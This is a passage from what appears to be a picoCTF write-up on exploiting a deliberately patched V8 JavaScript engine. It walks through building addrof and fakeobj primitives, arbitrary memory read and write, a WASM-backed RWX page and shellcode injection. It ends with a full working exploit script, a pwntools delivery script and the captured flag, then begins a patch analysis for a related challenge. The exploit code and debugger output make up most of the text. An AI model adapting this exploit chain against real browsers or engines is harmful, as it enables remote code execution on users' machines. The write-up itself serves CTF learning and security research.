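console.log(encodeSmi(0x12345678).toString(16));     // 2468acf0
console.log(tagPointer(0x12345678n).toString(16));   // 12345679
console.log(isSmi(0x2468acf0n), isSmi(0x12345679n)); // true false
```

Note there is no such check for doubles: any 64-bit pattern is a valid double, which is exactly why reading a pointer through a float array "just works".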

We can see the example of an smi in the second value from the x/10gx command above: 0x0000000408085161. The upper 4 bytes are 4, which is double 2, so this is the length of the list. The lower 4 bytes correspond to the pointer to the elements array, which stores the values themselves. Let's double-check that:

gef➤  x/4gx 0x0a5e08085161-1
0xa5e08085160:	0x0000000408042a99	0x3ff8000000000000
0xa5e08085170:	0x4004000000000000	0x0804222d082439f1

The first value 0x0000000408042a99 is the length smi (a value of 2, doubled as it's an smi) followed by what I assume is a pointer to the map. That's not important - what's important is the next two values are the floating-point representations of 1.5 and 2.5 (I recognise them from oob-v8!), while the value directly after is 0x0804222d082439f1, the properties and map pointer. This means our OOB can work as planned! We just have to ensure we preserve the top 32 bits of this value so we don't ruin the properties pointer.

Note that we don't know the upper 4 bytes of the full pointers (the isolate root), but that's not important!

Let's test that the OOB works as we expected by calling setHorsepower() on an array, and reading past the end.

d8> a.setHorsepower(5)
[1.5, 2.5, , , ]
d8> a[2]
4.763796150676345e-270
d8> ftoi(a[2]).toString(16)
"804222d082439f1"

Fantastic!
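To make the leaked word a bit more concrete, here is a small sketch that splits it into its two compressed pointers, and rebuilds it with a different map while keeping the properties half intact. It starts from the hex value printed above; withMap is a hypothetical helper name, and the replacement map value is only there for illustration.

```javascript
// The 64-bit word read out of bounds, as printed by ftoi(a[2]) above.
const leaked = 0x0804222d082439f1n;

const map = leaked & 0xffffffffn; // lower 32 bits: compressed map pointer
const properties = leaked >> 32n; // upper 32 bits: compressed properties pointer

console.log("map:        0x" + map.toString(16));        // map:        0x82439f1
console.log("properties: 0x" + properties.toString(16)); // properties: 0x804222d

// Hypothetical helper: swap the map but preserve the top 32 bits (properties).
function withMap(word, new_map) {
    return (word & (0xffffffffn << 32n)) | (new_map & 0xffffffffn);
}

console.log(withMap(leaked, 0x08243a41n).toString(16)); // 804222d08243a41
```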

Complications while Grabbing Maps

This is a bit more complicated than in oob-v8, because of one simple fact: last time, we gained an addrof primitive using this:

var float_arr = [1.5, 2.5];
var map_float = float_arr.oob();

var initial_obj = {a:1};	// placeholder object
var obj_arr = [initial_obj];
var map_obj = obj_arr.oob();

function addrof(obj) {
    obj_arr[0] = obj;			// put desired obj for address leak into index 0
    obj_arr.oob(map_float);		// change to float map
    let leak = obj_arr[0];		// read address
    obj_arr.oob(map_obj);		// change back to object map, to prevent issues down the line
    return ftoi(leak);			// return leak as an integer
}

In our current scenario, you could argue that we can reuse this (with minor modifications) and get this:

var float_arr = [1.5, 2.5];
float_arr.setHorsepower(3);
var map_float = float_arr[2];

var initial_obj = {a:1};	// placeholder object
var obj_arr = [initial_obj];
obj_arr.setHorsepower(2);
var map_obj = obj_arr[1];

function addrof(obj) {
    obj_arr[0] = obj;			// put desired obj for address leak into index 0
    obj_arr[1] = map_float;		// change to float map
    let leak = obj_arr[0];		// read address
    obj_arr[1] = map_obj;		// change back to object map, to prevent issues down the line
    return ftoi(leak);			// return leak as an integer
}

However, this does not work. Why? It's the difference between these two lines:

var map_obj = obj_arr.oob();
var map_obj = obj_arr[1];

In oob-v8, we noted that the function .oob() not only reads an index past the end, but it also returns it as a double. And that's the key difference - in this challenge, we can read past the end of the array, but this time it's treated as an object. obj_arr[1] will, therefore, return an object - and a pretty invalid one, at that!

You might be thinking that we don't need the object map to get an addrof primitive at all: we just wouldn't be able to set the map back, so we could create a one-use array instead. I tried exactly that and spent an age working out why it didn't work, instead returning a NaN, but of course it was this line:

obj_arr[1] = map_float;

Setting the map to that of a float array would never work, as it would treat the first index like an object again!

A new addrof()

So, this time we can't copy the object map so easily. But not all is lost! Instead of having a single OOB read/write, we can set the array to have a huge length. This way, we can use an OOB on the float array to read the map of the object array - if we set it correctly, that is.

Aligning Memory

Let's create two arrays, one of floats and one of objects. We'll also grab the float map (which will also contain the properties pointer!) while we're at it.

var float_arr = [1.5, 2.5];
float_arr.setHorsepower(50);
var float_map = float_arr[2];             // both map and properties


var initial_obj = {a:1};	          // placeholder object
var obj_arr = [initial_obj];
obj_arr.setHorsepower(50);

My initial thought was to create an array like this:

var obj_arr = [3.5, 3.5, initial_obj];

And then I could slowly increment the index of float_arr, reading along in memory until we came across two 3.5 values in a row. I would then know that the location directly after was our desired object, making a reliable leak. Unfortunately, while debugging, it seems like mixed arrays are not quite that simple (unsurprisingly, perhaps). Instead, I'm gonna hope and pray that the offset is constant (and if it's not, we'll come back and play with the mixed array further).

Let's determine the offset. I'm gonna %DebugPrint float_arr, obj_arr and initial_obj:

DebugPrint: 0x30e008085931: [JSArray]
 - map: 0x30e0082439f1 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
 - prototype: 0x30e00820ab61 <JSArray[0]>
 - elements: 0x30e008085919 <FixedDoubleArray[2]> [PACKED_DOUBLE_ELEMENTS]
 - length: 50
 - properties: 0x30e00804222d <FixedArray[0]>
 - All own properties (excluding elements): {
    0x30e0080446d1: [String] in ReadOnlySpace: #length: 0x30e00818215d <AccessorInfo> (const accessor descriptor), location: descriptor
 }
 - elements: 0x30e008085919 <FixedDoubleArray[2]> {
           0: 1.5
           1: 2.5
 }
DebugPrint: 0x30e008085985: [JSArray]
 - map: 0x30e008243a41 <Map(PACKED_ELEMENTS)> [FastProperties]
 - prototype: 0x30e00820ab61 <JSArray[0]>
 - elements: 0x30e008085979 <FixedArray[1]> [PACKED_ELEMENTS]
 - length: 50
 - properties: 0x30e00804222d <FixedArray[0]>
 - All own properties (excluding elements): {
    0x30e0080446d1: [String] in ReadOnlySpace: #length: 0x30e00818215d <AccessorInfo> (const accessor descriptor), location: descriptor
 }
 - elements: 0x30e008085979 <FixedArray[1]> {
           0: 0x30e00808594d <Object map = 0x30e0082459f9>
 }

DebugPrint: 0x30e00808594d: [JS_OBJECT_TYPE]
 - map: 0x30e0082459f9 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x30e008202f11 <Object map = 0x30e0082421b9>
 - elements: 0x30e00804222d <FixedArray[0]> [HOLEY_ELEMENTS]
 - properties: 0x30e00804222d <FixedArray[0]>
 - All own properties (excluding elements): {
    0x30e0080477ed: [String] in ReadOnlySpace: #a: 1 (const data field 0), location: in-object
 }

Let's check the obj_arr first:

gef➤  x/6gx 0x30e008085979-1
0x30e008085978:	0x0000000208042205	0x08243a410808594d
0x30e008085988:	0x080859790804222d	0x080425a900000064
0x30e008085998:	0x0000000400000003	0x0000000029386428

In line with what we get from %DebugPrint(), the lower 4 bytes of the second value are 0808594d, the compressed pointer to initial_obj. If we print from elements onwards for the float_arr:

gef➤  x/20gx 0x30e008085919-1 
0x30e008085918:	0x0000000408042a99	0x3ff8000000000000
0x30e008085928:	0x4004000000000000	0x0804222d082439f1
0x30e008085938:	0x0000006408085919	0x082439f1080423d1
0x30e008085948:	0x082459f90804222d	0x0804222d0804222d
0x30e008085958:	0x08045a0100000002	0x0000000000010001
0x30e008085968:	0x080477ed080421f9	0x0000000200000088
0x30e008085978:	0x0000000208042205	0x08243a410808594d
0x30e008085988:	0x080859790804222d	0x080425a900000064
0x30e008085998:	0x0000000400000003	0x0000000029386428
0x30e0080859a8:	0x0000000000000000	0x0000000000000000

We can see the value 0x08243a410808594d at 0x30e008085980. If the value 1.5 at 0x30e008085920 is index 0, we can count up in 8-byte steps and get an index of 12. Let's try that:

function addrof(obj) {
    obj_arr[0] = obj;
    let leak = float_arr[12];
    return ftoi(leak);
}
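If counting rows in a hexdump isn't your thing, the index of 12 used in addrof() can also be worked out with a bit of arithmetic. A minimal sketch, using the addresses from the x/20gx dump above (they will differ between runs, but the distance is what matters):

```javascript
// Addresses taken from the x/20gx dump above.
const first_element = 0x30e008085920n; // float_arr[0], holds 1.5
const target = 0x30e008085980n;        // word holding obj_arr[0] (low half) and obj_arr's map (high half)

// Each slot in a FixedDoubleArray is 8 bytes wide.
const index = (target - first_element) / 8n;
console.log(index); // 12n
```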

%DebugPrint(initial_obj);
console.log("Leak: 0x" + addrof(initial_obj).toString(16))

And from the output, it looks very promising!

Leak: 0x8243a410808593d
DebugPrint: 0x28a60808593d: [JS_OBJECT_TYPE]
 - map: 0x28a6082459f9 <Map(HOLEY_ELEMENTS)> [FastProperties]
 - prototype: 0x28a608202f11 <Object map = 0x28a6082421b9>
 - elements: 0x28a60804222d <FixedArray[0]> [HOLEY_ELEMENTS]
 - properties: 0x28a60804222d <FixedArray[0]>
 - All own properties (excluding elements): {
    0x28a6080477ed: [String] in ReadOnlySpace: #a: 1 (const data field 0), location: in-object
 }

The lower 4 bytes match up perfectly. We're gonna return just the last 4 bytes:

return ftoi(leak) & 0xffffffffn;

And bam, we have an addrof() primitive. Time to get a fakeobj().

A new fakeobj()

If we follow the same principle for fakeobj(), we get:

function fakeobj(compressed_addr) {
    float_arr[12] = itof(compressed_addr);
    return obj_arr[0];
}

However, remember that pointer compression is a thing! We have to make sure the upper 4 bytes are consistent. This isn't too bad, as we can read it once and remember it for all future sets:

// store upper 4 bytes of leak
let upper = ftoi(float_arr[12]) & (0xffffffffn << 32n);

And then fakeobj() becomes

function fakeobj(compressed_addr) {
    float_arr[12] = itof(upper + compressed_addr);
    return obj_arr[0];
}
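As a worked example of that masking, here is the same arithmetic on the raw leak printed by the addrof() test earlier. This is only a sketch of the bit-twiddling (no patched d8 involved); buildWord is a made-up name, and 0x080859e1 is just an example compressed address.

```javascript
const leak = 0x08243a410808593dn; // raw 64-bit leak printed earlier

const upper = leak & (0xffffffffn << 32n); // keep obj_arr's map, zero the low half
const compressed = leak & 0xffffffffn;     // what addrof() ends up returning

// Hypothetical helper: the 64-bit word fakeobj() writes for a compressed address.
function buildWord(compressed_addr) {
    return upper + compressed_addr;
}

console.log(upper.toString(16));                  // 8243a4100000000
console.log(compressed.toString(16));             // 808593d
console.log(buildWord(0x080859e1n).toString(16)); // 8243a41080859e1
```

The upper half is the map of obj_arr, which sits right after element 0 in memory, so writing it back unchanged keeps obj_arr a valid object array.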

We can test this with the following code:

// first leak the address
let addr_initial = addrof(initial_obj);
// now try and create an object from it
let fake = fakeobj(addr_initial);
// fake should now be pointing to initial_obj
// meaning fake.a should be 1
console.log(fake.a);

If I run this, it does in fact print 1:

gef➤  run --allow-natives-syntax --shell exploit.js
1
V8 version 9.1.0 (candidate)
d8>

I was as impressed as anybody that this actually worked, I can't lie.

Arbitrary Read

Once again, we're gonna try and gain an arbitrary read by creating a fake array object that we can control the elements pointer for. The offsets are gonna be slightly different due to pointer compression. As we saw earlier, the first 8 bytes are the compressed pointer for properties and map, while the second 8 bytes are the smi for length and then the compressed pointer for elements. Let's create an initial arb_rw_array like before, and print out the layout:

var arb_rw_arr = [float_map, 1.5, 2.5, 3.5];
console.log("[+] Address of Arbitrary RW Array: 0x" + addrof(arb_rw_arr).toString(16));

%DebugPrint(arb_rw_arr)

[+] Address of Arbitrary RW Array: 0x8085a01
DebugPrint: 0x161c08085a01: [JSArray]
 - map: 0x161c082439f1 <Map(PACKED_DOUBLE_ELEMENTS)> [FastProperties]
 - prototype: 0x161c0820ab61 <JSArray[0]>
 - elements: 0x161c080859d9 <FixedDoubleArray[4]> [PACKED_DOUBLE_ELEMENTS]
 - length: 4
 - properties: 0x161c0804222d <FixedArray[0]>
 - All own properties (excluding elements): {
    0x161c080446d1: [String] in ReadOnlySpace: #length: 0x161c0818215d <AccessorInfo> (const accessor descriptor), location: descriptor
 }
 - elements: 0x161c080859d9 <FixedDoubleArray[4]> {
           0: 4.7638e-270
           1: 1.5
           2: 2.5
           3: 3.5
 }

The leak works perfectly. Once again, elements is ahead of the JSArray itself.

If we want to try and fake an array with compressed pointers, then we have the following format:

32-bit pointer to properties
32-bit pointer to map
smi for length
32-bit pointer to elements

The first two we have already solved with float_map. We can fix the latter two like this:

function arb_read(compressed_addr) {
    // tag pointer
    if (compressed_addr % 2n == 0)
        compressed_addr += 1n;

    // place a fake object over the elements of the valid array
    // we know the elements array is placed just ahead in memory, so with a length
    // of 4 it's an offset of 4 * 0x8 = 0x20 
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);

    // overwrite `elements` field of fake array
    // size of 2 and elements pointer
    arb_rw_arr[1] = itof((0x2n << 33n) + compressed_addr);

    // index 0 returns the arbitrary read value
    return ftoi(fake[0]);
}

We can test the arbitrary read, and I'm going to do this by grabbing the float_map location and reading the data there:

// test arb_read
let float_map_lower = ftoi(float_map) & 0xffffffffn
console.log("Map at: 0x" + float_map_lower.toString(16))
console.log("Read: 0x" + arb_read(float_map_lower).toString(16));

Map at: 0x82439f1
Read: 0xa0007ff2100043d

A little bit of inspection at the location of float_map shows us we're 8 bytes off:

gef➤  x/10gx 0x3f09082439f1-1
0x3f09082439f0:	0x1604040408042119	0x0a0007ff2100043d
0x3f0908243a00:	0x082439c90820ab61	0x080421b90820b031
0x3f0908243a10:	0x0820b07d08182405	0x1604040408042119

This is because the first 8 bytes in the elements array are for the length smi and then for a compressed map pointer, so we just subtract 8 and get a valid arb_read():

function arb_read(compressed_addr) {
    // tag pointer
    if (compressed_addr % 2n == 0)
        compressed_addr += 1n;

    // place a fake object over the elements of the valid array
    // we know the elements array is placed just ahead in memory, so with a length
    // of 4 it's an offset of 4 * 0x8 = 0x20
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);

    // overwrite `elements` field of fake array
    // size of 2 and elements pointer
    // the elements array starts with a map pointer and a length smi, so subtract 0x8
    arb_rw_arr[1] = itof((0x2n << 33n) + compressed_addr - 8n);

    // index 0 returns the arbitrary read value
    return ftoi(fake[0]);
}
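The offsets in arb_read() are easy to get wrong, so here is the arithmetic on its own, using the values from the run above (addrof(arb_rw_arr) = 0x8085a01 and the map at 0x82439f1). It's a sketch of the number-crunching only; fakeElementsWord is a made-up name.

```javascript
const arr_addr = 0x08085a01n;       // addrof(arb_rw_arr) from the output above
const fake_addr = arr_addr - 0x20n; // tagged address of arb_rw_arr[0], where float_map sits
console.log(fake_addr.toString(16)); // 80859e1

// Hypothetical helper: the word stored in arb_rw_arr[1], which the fake array
// sees as its elements pointer (low half) and length smi (high half).
function fakeElementsWord(target) {
    if (target % 2n == 0n) target += 1n; // tag the pointer
    return (0x2n << 33n) + target - 8n;  // -8 skips the elements header
}

const word = fakeElementsWord(0x082439f1n);
console.log(word.toString(16));                 // 4082439e9
console.log((word >> 33n).toString());          // 2
console.log((word & 0xffffffffn).toString(16)); // 82439e9
```

The length smi of 2 lands in the upper 32 bits (2 << 1, then << 32), and the lower 32 bits point 8 bytes before the target so that index 0 of the fake array lines up with it.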

Arbitrary Write

Initial

We can continue with the initial_arb_write() from oob-v8, with a couple of minor changes:

function initial_arb_write(compressed_addr, val) {
    // place a fake object and change elements, as before
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
    arb_rw_arr[1] = itof((0x2n << 33n) + compressed_addr - 8n);

    // Write to index 0
    fake[0] = itof(BigInt(val));
}

We can test this super easily too, with the same principle:

let float_map_lower = ftoi(float_map) & 0xffffffffn;
console.log("Map at: 0x" + float_map_lower.toString(16));
initial_arb_write(float_map_lower, 0x12345678n);

Observing the map location in GDB tells us the write worked:

gef➤  x/4gx 0xf84082439f1-1
0xf84082439f0:	0x0000000012345678	0x0a0007ff2100043d
0xf8408243a00:	0x082439c90820ab61	0x080421b90820b031

Full

Last time we improved our technique by using ArrayBuffer backing pointers. This is a bit harder this time because for this approach you need to know the full 64-bit pointers, not just the compressed version. This is genuinely very difficult because the isolate root is stored in the r13 register, not anywhere in memory. As a result, we're going to be using initial_arb_write() as if it's arb_write(), and hoping it works.

If anybody knows of a way to leak the isolate root, please let me know!

Shellcoding

The final step is to shellcode our way through, using the same technique as last time. The offsets are slightly different, but I'm sure that by this point you can find them yourself!

First I'll use any WASM code to create the RWX page, like I did for oob-v8:

var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;

Again, this generates an RWX page:

gef➤  vmmap
[...]
0x000007106675a000 0x000007106675b000 0x0000000000000000 rwx 
[...]

We use the same technique as before, printing out the wasm_instance address and comparing it to the output of search-pattern:

gef➤  search-pattern 0x000007106675a000
[+] Searching '\x00\xa0\x75\x66\x10\x07\x00\x00' in memory
[+] In (0x3c108200000-0x3c108280000), permission=rw-
  0x3c108211ad4 - 0x3c108211af4  →   "\x00\xa0\x75\x66\x10\x07\x00\x00[...]"
  [...]

I get an offset of 0x67. In reality it is 0x68 (pointer tagging!), but who cares.
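The 0x67 versus 0x68 business is just pointer tagging again, and a couple of lines of arithmetic show it. The instance address below is an assumption for illustration: I've back-computed it from the search-pattern hit at ...08211ad4, so treat it as a made-up but consistent example.

```javascript
// Assumed for illustration: compressed, untagged wasm_instance address
// (search-pattern hit 0x08211ad4 minus 0x68).
const instance_untagged = 0x08211a6cn;
const instance_tagged = instance_untagged | 1n; // what addrof() returns

const via_tagged = instance_tagged + 0x67n;     // offset from the tagged address
const via_untagged = instance_untagged + 0x68n; // offset from the real address

console.log(via_tagged === via_untagged); // true
console.log(via_tagged.toString(16));     // 8211ad4
```

arb_read() then sets the low bit again because the result is even, and its 8-byte adjustment for the elements header means the read still lands on the 8 bytes at untagged + 0x68.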

Now we can use the ArrayBuffer technique, because we know all the bits of the address! We can just yoink it directly from the oob-v8 writeup (slightly changing 0x20 to 0x14, as that is the new offset with compression):

function copy_shellcode(addr, shellcode) {
    // create a buffer of 0x100 bytes
    let buf = new ArrayBuffer(0x100);
    let dataview = new DataView(buf);
    
    // overwrite the backing store so the 0x100 bytes can be written to where we want
    let buf_addr = addrof(buf);
    let backing_store_addr = buf_addr + 0x14n;
    arb_write(backing_store_addr, addr);

    // write the shellcode 4 bytes at a time
    for (let i = 0; i < shellcode.length; i++) {
        dataview.setUint32(4*i, shellcode[i], true);
    }
}
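The write loop is worth seeing in isolation, since the third argument to setUint32() is what decides the byte order. A minimal sketch on an ordinary ArrayBuffer (no backing store tricks), using the first two words of the cat flag.txt payload from this page:

```javascript
// Write 32-bit words little-endian into a normal ArrayBuffer and dump the bytes.
const words = [0x0cfe016a, 0x2fb84824]; // first two words of the payload
const buf = new ArrayBuffer(words.length * 4);
const dataview = new DataView(buf);

for (let i = 0; i < words.length; i++) {
    dataview.setUint32(4 * i, words[i], true); // true = little-endian
}

const hex = Array.from(new Uint8Array(buf), b => b.toString(16).padStart(2, "0")).join(" ");
console.log(hex); // 6a 01 fe 0c 24 48 b8 2f
```

Each word comes out least significant byte first, which is the order the CPU will execute them in once the backing store points at the RWX page.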

I am going to grab the shellcode for cat flag.txt from this writeup, because I suck ass at working out endianness and it's a lot of effort for a fail :)))

payload = [0x0cfe016a, 0x2fb84824, 0x2f6e6962, 0x50746163, 0x68e78948, 0x7478742e, 0x0101b848, 0x01010101, 0x48500101, 0x756062b8, 0x606d6701, 0x04314866, 0x56f63124, 0x485e0c6a, 0x6a56e601, 0x01485e10, 0x894856e6, 0x6ad231e6, 0x050f583b]
copy_shellcode(rwx_base, payload);
f();

Running this:

$ ./d8 exploit.js 
[+] Address of Arbitrary RW Array: 0x8086551
[+] RWX Region located at 0xf06b12a5000
cat: flag.txt: No such file or directory

Ok, epic! Let's deliver it remotely using the same script as Kit Engine:

from pwn import *

with open("exploit.js", "rb") as f:
    exploit = f.read()

p = remote('mercury.picoctf.net', 60233)
p.sendlineafter(b'5k:', str(len(exploit)).encode())
p.sendlineafter(b'please!!\n', exploit)

p.recvuntil(b"Stdout b'")
flag = p.recvuntil(b"\\")[:-1]
print(flag.decode())

And we get the flag!

$ python3 deliver.py 
[+] Opening connection to mercury.picoctf.net on port 60233: Done
picoCTF{sh0u1d_hAv3_d0wnl0ad3d_m0r3_rAm_3a9ef72562166255}
[*] Closed connection to mercury.picoctf.net port 60233

Full Exploit

// setup
var buf = new ArrayBuffer(8);
var f64_buf = new Float64Array(buf);
var u64_buf = new Uint32Array(buf);

function ftoi(val) { // typeof(val) = float
    f64_buf[0] = val;
    return BigInt(u64_buf[0]) + (BigInt(u64_buf[1]) << 32n);
}

function itof(val) { // typeof(val) = BigInt
    u64_buf[0] = Number(val & 0xffffffffn);
    u64_buf[1] = Number(val >> 32n);
    return f64_buf[0];
}

// addrof and fakeobj
var float_arr = [1.5, 2.5];
float_arr.setHorsepower(50);
var float_map = float_arr[2];       // both map and properties


var initial_obj = {a:1};	// placeholder object
var obj_arr = [initial_obj];
obj_arr.setHorsepower(50);


// store upper 4 bytes of leak
let upper = ftoi(float_arr[12]) & (0xffffffffn << 32n);

function addrof(obj) {
    obj_arr[0] = obj;
    let leak = float_arr[12];
    return ftoi(leak) & 0xffffffffn;
}

function fakeobj(compressed_addr) {
    float_arr[12] = itof(upper + compressed_addr);
    return obj_arr[0];
}

/* test addrof and fakeobj
// first leak the address
let addr_initial = addrof(initial_obj);
// now try and create an object from it
let fake = fakeobj(addr_initial);
// fake should now be pointing to initial_obj
// meaning fake.a should be 1
console.log(fake.a);
*/

// array for access to arbitrary memory addresses
var arb_rw_arr = [float_map, 1.5, 2.5, 3.5];
console.log("[+] Address of Arbitrary RW Array: 0x" + addrof(arb_rw_arr).toString(16));
// %DebugPrint(arb_rw_arr);

function arb_read(compressed_addr) {
    // tag pointer
    if (compressed_addr % 2n == 0)
        compressed_addr += 1n;

    // place a fake object over the elements of the valid array
    // we know the elements array is placed just ahead in memory, so with a length
    // of 4 it's an offset of 4 * 0x8 = 0x20
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);

    // overwrite `elements` field of fake array
    // size of 2 and elements pointer
    // initially with the map and a size smi, so 0x8 offset
    arb_rw_arr[1] = itof((0x2n << 33n) + compressed_addr - 8n);

    // index 0 returns the arbitrary read value
    return ftoi(fake[0]);
}

/* test arb_read
let float_map_lower = ftoi(float_map) & 0xffffffffn;
console.log("Map at: 0x" + float_map_lower.toString(16));
console.log("Read: 0x" + arb_read(float_map_lower).toString(16));
*/

// would normally be initial, but we hope and pray
function arb_write(compressed_addr, val) {
    // place a fake object and change elements, as before
    let fake = fakeobj(addrof(arb_rw_arr) - 0x20n);
    arb_rw_arr[1] = itof((0x2n << 33n) + compressed_addr - 8n);

    // Write to index 0
    fake[0] = itof(BigInt(val));
}

/* test arb_write
let float_map_lower = ftoi(float_map) & 0xffffffffn;
console.log("Map at: 0x" + float_map_lower.toString(16));
arb_write(float_map_lower, 0x12345678n);
*/

var wasm_code = new Uint8Array([0,97,115,109,1,0,0,0,1,133,128,128,128,0,1,96,0,1,127,3,130,128,128,128,0,1,0,4,132,128,128,128,0,1,112,0,0,5,131,128,128,128,0,1,0,1,6,129,128,128,128,0,0,7,145,128,128,128,0,2,6,109,101,109,111,114,121,2,0,4,109,97,105,110,0,0,10,138,128,128,128,0,1,132,128,128,128,0,0,65,42,11]);
var wasm_mod = new WebAssembly.Module(wasm_code);
var wasm_instance = new WebAssembly.Instance(wasm_mod);
var f = wasm_instance.exports.main;

let rwx_pointer_loc = addrof(wasm_instance) + 0x67n;
let rwx_base = arb_read(rwx_pointer_loc);
console.log("[+] RWX Region located at 0x" + rwx_base.toString(16));

// copy the shellcode into the RWX page by redirecting an ArrayBuffer's backing store
function copy_shellcode(addr, shellcode) {
    // create a buffer of 0x100 bytes
    let buf = new ArrayBuffer(0x100);
    let dataview = new DataView(buf);
    
    // overwrite the backing store so the 0x100 bytes can be written to where we want
    let buf_addr = addrof(buf);
    let backing_store_addr = buf_addr + 0x14n;
    arb_write(backing_store_addr, addr);

    // write the shellcode 4 bytes at a time
    for (let i = 0; i < shellcode.length; i++) {
        dataview.setUint32(4*i, shellcode[i], true);
    }
}

payload = [0x0cfe016a, 0x2fb84824, 0x2f6e6962, 0x50746163, 0x68e78948, 0x7478742e, 0x0101b848, 0x01010101, 0x48500101, 0x756062b8, 0x606d6701, 0x04314866, 0x56f63124, 0x485e0c6a, 0x6a56e601, 0x01485e10, 0x894856e6, 0x6ad231e6, 0x050f583b]
copy_shellcode(rwx_base, payload);
f();

// picoCTF{sh0u1d_hAv3_d0wnl0ad3d_m0r3_rAm_3a9ef72562166255}

The Challenge

The actual challenge

The Patch

Let's first read the patch itself:

diff --git a/src/bootstrapper.cc b/src/bootstrapper.cc
index b027d36..ef1002f 100644
--- a/src/bootstrapper.cc
+++ b/src/bootstrapper.cc
@@ -1668,6 +1668,8 @@ void Genesis::InitializeGlobal(Handle<JSGlobalObject> global_object,
                           Builtins::kArrayPrototypeCopyWithin, 2, false);
     SimpleInstallFunction(isolate_, proto, "fill",
                           Builtins::kArrayPrototypeFill, 1, false);
+    SimpleInstallFunction(isolate_, proto, "oob",
+                          Builtins::kArrayOob,2,false);
     SimpleInstallFunction(isolate_, proto, "find",
                           Builtins::kArrayPrototypeFind, 1, false);
     SimpleInstallFunction(isolate_, proto, "findIndex",
diff --git a/src/builtins/builtins-array.cc b/src/builtins/builtins-array.cc
index 8df340e..9b828ab 100644
--- a/src/builtins/builtins-array.cc
+++ b/src/builtins/builtins-array.cc
@@ -361,6 +361,27 @@ V8_WARN_UNUSED_RESULT Object GenericArrayPush(Isolate* isolate,
   return *final_length;
 }
 }  // namespace
+BUILTIN(ArrayOob){
+    uint32_t len = args.length();
+    if(len > 2) return ReadOnlyRoots(isolate).undefined_value();
+    Handle<JSReceiver> receiver;
+    ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
+            isolate, receiver, Object::ToObject(isolate, args.receiver()));
+    Handle<JSArray> array = Handle<JSArray>::cast(receiver);
+    FixedDoubleArray elements = FixedDoubleArray::cast(array->elements());
+    uint32_t length = static_cast<uint32_t>(array->length()->Number());
+    if(len == 1){
+        //read
+        return *(isolate->factory()->NewNumber(elements.get_scalar(length)));
+    }else{
+        //write
+        Handle<Object> value;
+        ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
+                isolate, value, Object::ToNumber(isolate, args.at<Object>(1)));
+        elements.set(length,value->Number());
+        return ReadOnlyRoots(isolate).undefined_value();
+    }
+}
 
 BUILTIN(ArrayPush) {
   HandleScope scope(isolate);
diff --git a/src/builtins/builtins-definitions.h b/src/builtins/builtins-definitions.h
index 0447230..f113a81 100644
--- a/src/builtins/builtins-definitions.h
+++ b/src/builtins/builtins-definitions.h
@@ -368,6 +368,7 @@ namespace internal {
   TFJ(ArrayPrototypeFlat, SharedFunctionInfo::kDontAdaptArgumentsSentinel)     \
   /* https://tc39.github.io/proposal-flatMap/#sec-Array.prototype.flatMap */   \
   TFJ(ArrayPrototypeFlatMap, SharedFunctionInfo::kDontAdaptArgumentsSentinel)  \
+  CPP(ArrayOob)                                                                \
                                                                                \
   /* ArrayBuffer */                                                            \
   /* ES #sec-arraybuffer-constructor */                                        \
diff --git a/src/compiler/typer.cc b/src/compiler/typer.cc
index ed1e4a5..c199e3a 100644
--- a/src/compiler/typer.cc
+++ b/src/compiler/typer.cc
@@ -1680,6 +1680,8 @@ Type Typer::Visitor::JSCallTyper(Type fun, Typer* t) {
       return Type::Receiver();
     case Builtins::kArrayUnshift:
       return t->cache_->kPositiveSafeInteger;
+    case Builtins::kArrayOob:
+      return Type::Receiver();
 
     // ArrayBuffer functions.
     case Builtins::kArrayBufferIsView:

In essence, there is a new function ArrayOob that is implemented. We can see it's added to the array object as a .oob() method:

+    SimpleInstallFunction(isolate_, proto, "oob",
+                          Builtins::kArrayOob,2,false);

There's the odd bit of other stuff thrown around for getting it working, but the actual source of the challenge is (unsurprisingly) ArrayOob itself (with a name like that, who would have thought?). Cleaned up a little, it looks like this:

BUILTIN(ArrayOob){
    uint32_t len = args.length();
    if(len > 2) return ReadOnlyRoots(isolate).undefined_value();
    
    Handle<JSReceiver> receiver;
    ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
        isolate, receiver, Object::ToObject(isolate, args.receiver())
    );
    
    Handle<JSArray> array = Handle<JSArray>::cast(receiver);
    FixedDoubleArray elements = FixedDoubleArray::cast(array->elements());
    uint32_t length = static_cast<uint32_t>(array->length()->Number());
    
    if(len == 1) {
        //read
        return *(isolate->factory()->NewNumber(elements.get_scalar(length)));
    } else {
        //write
        Handle<Object> value;
        ASSIGN_RETURN_FAILURE_ON_EXCEPTION(
            isolate, value, Object::ToNumber(isolate, args.at<Object>(1))
        );
        elements.set(length,value->Number());
        return ReadOnlyRoots(isolate).undefined_value();
    }
}

Familiarity with the V8 codebase is unlikely, and even if you are familiar with it, it's unlikely you can read it like a native language. Step by step, this is what it does:

It looks at the number of arguments the function takes, then stores it in len
- If len is greater than 2, it returns undefined (note that the first argument is always this, so in reality it accepts at most one).
It then gets the array in question, stored in array
The array's elements are cast to a FixedDoubleArray, an array of fixed size that stores doubles, called elements
- The length of the array is stored in length
If there is no argument (len == 1, i.e. only this is passed) then elements[length] is returned as a number
- This is a clear Out-Of-Bounds (OOB) Read, as arrays in javascript are zero-indexed like most other programming languages
If an argument is given, elements[length] is set to the value that is the argument cast to a Number with Object::ToNumber
- This is a clear Out-Of-Bounds (OOB) Write, for the same reason as above
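
To make the off-by-one concrete, here's a rough JavaScript model of that logic. This is not V8 code: toyOob and the backing array are made up for illustration, and the third slot of backing simply stands in for whatever happens to sit after the real elements in memory.

```javascript
// Toy model of ArrayOob's logic. `toyOob` is a hypothetical helper, not a V8 API.
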